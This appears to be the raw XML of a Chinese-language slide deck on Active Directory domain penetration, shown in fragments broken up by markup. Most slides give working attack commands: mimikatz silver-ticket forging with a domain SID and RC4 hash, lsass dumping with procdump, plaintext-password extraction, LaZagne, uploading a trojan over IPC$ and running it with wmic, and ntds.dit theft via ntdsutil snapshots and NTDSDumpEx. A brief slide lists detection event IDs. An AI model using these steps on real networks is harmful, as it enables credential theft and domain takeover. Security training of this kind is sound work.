            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>domain:test.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /sid:S-1-5-21-4173655609-916892889-516531421  /target:dc-01.test.local /rc4:c9ed25bfab6f59f96b60903d064a1974  /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>service:cifs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user:yifan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ptt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172" y="3885550"/>
            <a:ext cx="6368954" cy="2767308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2209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92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1946228" y="482288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权限维持 </a:t>
            </a:r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SILVER TICKET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56" y="1670082"/>
            <a:ext cx="9236240" cy="4458086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23730" y="743898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3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69065" y="421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– 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导出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864" y="1819276"/>
            <a:ext cx="71699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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>procdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>来先</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，保存为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件，然后用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在本地破解明文</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hash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670" y="2790509"/>
            <a:ext cx="5159682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procdump64.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accepteula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -ma lsass.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lsass.dmp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4" y="3896267"/>
            <a:ext cx="10468134" cy="1891561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80979" y="761419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99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– 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导出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864" y="1819276"/>
            <a:ext cx="7169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然后在本地对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>下来的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进行破解</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="796670" y="2497022"/>
            <a:ext cx="8044703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mimikatz.exe "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sekurlsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>minidump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neicun.dmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sekurlsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>logonPasswords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> full" exit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4" y="3299212"/>
            <a:ext cx="6562725" cy="3298248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5842" y="709991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9312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– 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导出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864" y="1819276"/>
            <a:ext cx="716993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cobalt strike</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>logonpasswords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dmup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>明文密码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4" y="2615503"/>
            <a:ext cx="9886950" cy="385197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23730" y="758341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TWO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037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en-US" altLang="zh-CN" sz="2800" dirty="0" err="1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LaZagne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863" y="1608972"/>
            <a:ext cx="8551061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LaZagne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一个收集密码工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LaZagne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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>每个软件都使用不同的技术（纯文本，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，自定义算法，数据库等）存储其密码，这个工具是用来获取存储在本地计算机上的密码，诸如浏览器密码等等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" y="2660000"/>
            <a:ext cx="8877300" cy="257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1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命令行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1410" y="1608972"/>
            <a:ext cx="16131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建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ipc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/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942196" y="2403219"/>
            <a:ext cx="685654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建立后可以访问目标机器的文件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上传、下载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，也可以在目标机器上运行命令。 上传和下载文件直接通过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copy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命令就可以，不过路径换成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UNC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路径</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="942196" y="4286250"/>
            <a:ext cx="7620319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net use \\ip\ipc$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pawword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user:username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>连接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copy hacker.exe \\10.10.10.10\C$\windows\temp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>复制本地文件到目标服务器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copy \\10.10.10.10\C$\windows\temp\hash.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>复制目标服务器文件到本地</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166071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命令行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1411" y="1608972"/>
            <a:ext cx="1160895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建立连接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411" y="2341623"/>
            <a:ext cx="10715625" cy="156707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96670" y="4272015"/>
            <a:ext cx="316638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生成一个木马用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令上传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89" y="5083442"/>
            <a:ext cx="10887074" cy="155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2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命令行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66221" y="1621299"/>
            <a:ext cx="299312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然后使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wmic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令执行木马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11" y="2138384"/>
            <a:ext cx="10753725" cy="271851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11" y="3497643"/>
            <a:ext cx="9499335" cy="329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2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89714"/>
            <a:ext cx="49398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 net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66477" y="1793207"/>
            <a:ext cx="8436925" cy="175432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user /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domain                             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获取域用户列表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group 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“domain admins” </a:t>
            </a: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domain          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获取域管理员组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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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config</a:t>
            </a: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workstation                       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获取当前登录域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group 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“domain computers” </a:t>
            </a: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domain       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获取域机器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group /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domain                            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获取域中的组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net group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domain </a:t>
            </a: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controllers” /domain	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获取域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" y="4069404"/>
            <a:ext cx="6276975" cy="20669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207" y="4272478"/>
            <a:ext cx="609600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5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8649" y="1746277"/>
            <a:ext cx="7820026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windows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的密码是经过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hash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后存储的，本地存在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hklm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\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sam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</a:rPr>
              <a:t>hklm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\system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注册表中。域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里面存在域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控的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c:\windows\ntds\ntds.dit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中。 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ntds.dit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其实就是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个数据库，存储域中用户所有账号密码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hash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44402" y="38230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ntdsutil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>snapshot "activate instance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ntds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" create quit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quit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54204" y="3180287"/>
            <a:ext cx="1160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创建快照 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" y="4667250"/>
            <a:ext cx="60769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4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44402" y="2568374"/>
            <a:ext cx="76566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ntdsutil snapshot "mount </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{3428db83f-dad7-4e9f-b61d-ef272a3a483f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}" quit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quit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05182" y="1712076"/>
            <a:ext cx="1160895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挂载快照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62" y="3333750"/>
            <a:ext cx="6124575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97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77619" y="2543175"/>
            <a:ext cx="7594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copy C:\$SNAP_201910121047_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit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670" y="1765234"/>
            <a:ext cx="13613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复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ntds.dit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40" y="3319125"/>
            <a:ext cx="6124575" cy="10096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3740" y="4735393"/>
            <a:ext cx="110799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卸载快照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40" y="5434012"/>
            <a:ext cx="6105525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77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670" y="1765234"/>
            <a:ext cx="110799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删除快照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" y="2917143"/>
            <a:ext cx="6124575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4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83926" y="1699989"/>
            <a:ext cx="110799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获取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key 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83926" y="2400587"/>
            <a:ext cx="5290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reg save HKLM\SYSTEM c:\windows\temp\Sys.hiv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926" y="3176824"/>
            <a:ext cx="6143625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4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83926" y="1699989"/>
            <a:ext cx="410881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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NTDSDumpEx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获取所有域用户的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Hash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83926" y="2400587"/>
            <a:ext cx="5290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NTDSDumpEx.exe -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ntds.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -o hash.txt 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-s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sys.hiv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71" y="3200399"/>
            <a:ext cx="9223479" cy="306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45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28576" y="98617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96670" y="582547"/>
            <a:ext cx="62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3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91" name="等腰三角形 90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THR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900538" y="660837"/>
            <a:ext cx="493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渗透思路 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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导出域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white">
                    <a:lumMod val="95000"/>
                  </a:prstClr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hash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16" y="1544877"/>
            <a:ext cx="112395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0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46286" y="164954"/>
            <a:ext cx="2492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检测和防御</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="1383864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AD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>日志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>检测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4624</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：记录账户登录事件。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4768</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：申请</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TGT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>时触发该日志。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4769</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：申请</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>时触发该日志。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5136</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：目录服务对象被修改，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、账户对象等。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4728, 4732, 4756</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：向安全组中添加用户。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4738</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：用户账户被修改，如添加资源约束委派权限。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4672</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：特权登录，管理员权限用户登录时 和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4624</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一起触发。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4625</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：登录失败</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="4920236"/>
            <a:ext cx="2364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开源的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加固产品</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304237" y="5686619"/>
            <a:ext cx="169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360WatchAD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13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614" y="2194899"/>
            <a:ext cx="6108721" cy="9632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614" y="3760355"/>
            <a:ext cx="2651990" cy="26519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75" y="3770303"/>
            <a:ext cx="2642042" cy="264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8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576" y="64365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89714"/>
            <a:ext cx="49398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- net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01" y="1481537"/>
            <a:ext cx="5780237" cy="28374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1" y="3623958"/>
            <a:ext cx="6276975" cy="20193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876" y="3305962"/>
            <a:ext cx="5335807" cy="315188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876" y="1440804"/>
            <a:ext cx="6172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8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74664"/>
            <a:ext cx="5454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– portscan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11595" y="3244334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![](</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>域渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\36.png)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821" y="2201075"/>
            <a:ext cx="9379974" cy="426835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109" y="74144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4821" y="1572533"/>
            <a:ext cx="1326902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cobalt strike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17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6670" y="582547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74664"/>
            <a:ext cx="5454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lang="en-US" altLang="zh-CN" sz="4000" dirty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–nbtscan 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11595" y="3244334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![](</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>域渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\36.png)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933" y="2413516"/>
            <a:ext cx="7762875" cy="12001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19673" y="1753386"/>
            <a:ext cx="5287239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nbtscan.exe 10.10.10.0/24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8675" y="767276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138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文本框 88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="64249"/>
            <a:ext cx="5035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PART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1805384" y="274664"/>
            <a:ext cx="0" cy="85037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77245" y="598261"/>
            <a:ext cx="6230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1402438" y="909366"/>
            <a:ext cx="238991" cy="1923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92655" y="274664"/>
            <a:ext cx="5454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域信息搜集 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white">
                    <a:lumMod val="95000"/>
                  </a:prst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–nbtscan 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11595" y="3244334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![](</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>域渗透</a:t>
            </a:r>
            <a:r>
